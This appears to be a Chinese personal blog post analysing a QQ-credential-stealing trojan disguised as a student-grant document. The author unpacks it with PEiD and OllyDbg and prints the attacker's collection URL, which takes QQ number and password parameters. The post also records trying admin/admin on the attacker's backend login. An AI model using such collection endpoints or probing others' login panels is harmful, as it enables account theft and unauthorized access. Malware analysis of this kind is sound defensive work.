中午,邮箱中收到一封名为大学补学金文档(1) 的邮箱
图片
看着挺有趣的,就下载下来看看。

图片

第一感觉就是不对劲,为啥是exe格式的呢? 这年头学校都高级得这样?什么东西都自己开发程序了?
而且为啥压缩格式是7z,这么节省资源?干起环保事业了?

但是强大的好奇心让我解压后打开了。。。

双击了一次,没有反应? 再双击一次。。。
还是没有反应。

过了一会,点点QQ的界面,突然出现了一个腾讯QQ重新登录框

图片

折腾了下这个窗口,感觉怎么好像有点卡,而且看起来不美观啊。。。
突然想了想,为啥莫名其妙就出现这东西呢?我一直都很规矩的呀~_~
心里开始有底了。

打开任务管理器,看到 学生补助金.exe优雅地在最后一行默默地站着。
图片

一切都明白了,八成这就是个盗QQ号的木马。。。



果断结束进程
图片
框框一下就不见了,更加验证了我的猜想。

那么接下来就来看看这个传说中的“学生补奖金”吧。

首先我用7z打开来看了下。
图片
感觉应该没有加过壳,经验不足额、、、
接着用PEiD规规矩矩地查了下。。。
图片
这个壳,(⊙o⊙)…,第一次见到的。。。
So,找找手头有的工具,发现似乎没有可以脱的工具。
果断上百度。。。
先找找有没有工具,没有结果

只找到别人手脱的过程。
唉,自己动手学习学习了。。。

于是,借鉴 http://www.52pojie.cn/thread-49406-1-1.html 自己开始折腾了。
学习他,打开OD,找到ESP
图片
设置断点后,F9进入
图片
一路F8 那个忐忑啊@@ 。
终于,看到了光明。
图片
004EAE9A - FFE0 jmp eax ; 学生补学.00454435

这里飞向光明之巅(荣耀属于mycsy
图片
找到了OEP 尝试脱壳
图片
唉,虽然输入表好几个无效,无法运行,不管了。。。

再次查壳验证
图片
应该是脱壳成功了。。。

接着载入OD,查看字符串,希望可以一些信息。
图片
耐下心来,好好一个一个看。。。晕++

看来程序是通过跑到http://check.ptlogin2.qq.com验证密码的正误,还会拉去验证码,这样说来,是不是只有密码正确QQ的账号密码才会被发送到指定的地址?

再看到一条字符:

超级字串参考, 条目 137

地址=004040CD

反汇编=push UnPack_.00478C84

文本字串=The 0411558 file is missingn_C

0411558 是什么? 记得刚开始的压缩文件吗? 就在其中。。。
图片


果断万能的记事本打开它
图片
这个是脚本吧?。。。

尝试打开http://ueryrtew.gwrewt.net/fe86dsdb/find.asp?QQNumber=074419977&QQPassWord=074419887
网页一片空白,没有回显
图片
再次刷新,结果一样。
于是猜想是不是上传QQ账号和密码的地址呢?

尝试打开
http://ueryrtew.gwrewt.net/fe86dsdb/find.asp 空白网页
http://ueryrtew.gwrewt.net/fe86dsdb/ 登陆界面
http://ueryrtew.gwrewt.net 拒绝访问
http://gwrewt.net 无法打开
图片
难道这就是传说中的后台?
试了下admin admin 确实,没有这么白痴,无法进入。。。

再次搜索程序字符串,找不到关于这个网页的任何有用信息。 看来程序应该没有直接调用什么东西去访问这个网站,估计就是通过调用0411558这个脚本来访问这个网站的。这样做的目的,我猜想是为了躲避杀毒软件的主动防御,行为检测。
想到这,上virscan.org 查一下它看看。。。
图片
厉害啊,国内估计就一个NOD32可以报毒了。。。
根据扫描的结果,其实真正意义讲只有三个杀毒怀疑它是木马或病毒、后门。。。

顺便查了下IP
图片

下一步还能够干什么呢。。。郁闷(⊙o⊙)…